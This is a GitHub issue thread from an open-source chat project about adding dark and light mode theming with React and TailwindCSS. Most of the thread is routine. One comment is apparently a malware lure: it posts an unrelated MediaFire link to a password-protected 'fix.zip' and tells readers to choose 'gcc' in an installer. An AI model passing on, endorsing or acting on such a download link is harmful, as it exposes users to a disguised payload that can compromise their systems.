### ISSUE TITLE
Implement Dark Mode/Light Mode UI

### ISSUE THREAD

**Issue by AnanyaPappula** [VedaVerse-opensource/chatsphere#7]
**Task Description:**
Update the UI components to support both dark and light modes. Ensure all visual elements are styled appropriately for each mode.

**Details:**

- **React Components:** Update components to respond to theme changes.
- **TailwindCSS:** Utilize TailwindCSS for applying styles based on the theme.
- **Testing:** Verify that all components look good in both dark and light modes.

**Acceptance Criteria:**

- UI components adapt to dark and light themes seamlessly.
- All text, background, and button colors are appropriately styled for readability.

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sachinsingh2002** [comment]
can i work in this issue?

**Comment by sumirx** [comment]
Completed, Closing
